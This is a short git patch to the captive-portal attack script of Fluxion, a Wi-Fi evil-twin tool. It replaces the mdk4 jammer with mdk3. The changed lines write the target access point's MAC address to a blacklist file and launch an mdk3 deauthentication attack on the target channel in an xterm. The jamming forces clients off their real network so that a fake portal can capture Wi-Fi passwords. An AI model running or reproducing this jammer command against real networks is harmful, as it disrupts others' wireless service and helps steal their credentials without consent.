From 2db2ef38a03bc82cf6f03cae8eae2af26e90e5aa Mon Sep 17 00:00:00 2001 From: Usama Abdul Sattar Date: Mon, 29 Jul 2019 08:03:44 +0500 Subject: [PATCH] remove mdk4 and using mdk3 --- attacks/Captive Portal/attack.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 92f2d53..a2b4592 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1415,7 +1415,7 @@ stop_attack() { 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalJammerServiceXtermPID="" # Clear parent PID fi - sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk4_blacklist.lst" + sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk3_blacklist.lst" # Kill captive portal web server log viewer. if [ "$CaptivePortalWebServiceXtermPID" ]; then @@ -1511,7 +1511,7 @@ start_attack() { CaptivePortalWebServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice" - echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk4_blacklist.lst" + echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" if [ $FLUXIONEnable5GHZ -eq 1 ]; then xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ @@ -1523,7 +1523,7 @@ start_attack() { xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ - "mdk4 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk4_blacklist.lst\"" & + "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & # Save parent's pid, to get to child later. CaptivePortalJammerServiceXtermPID=$!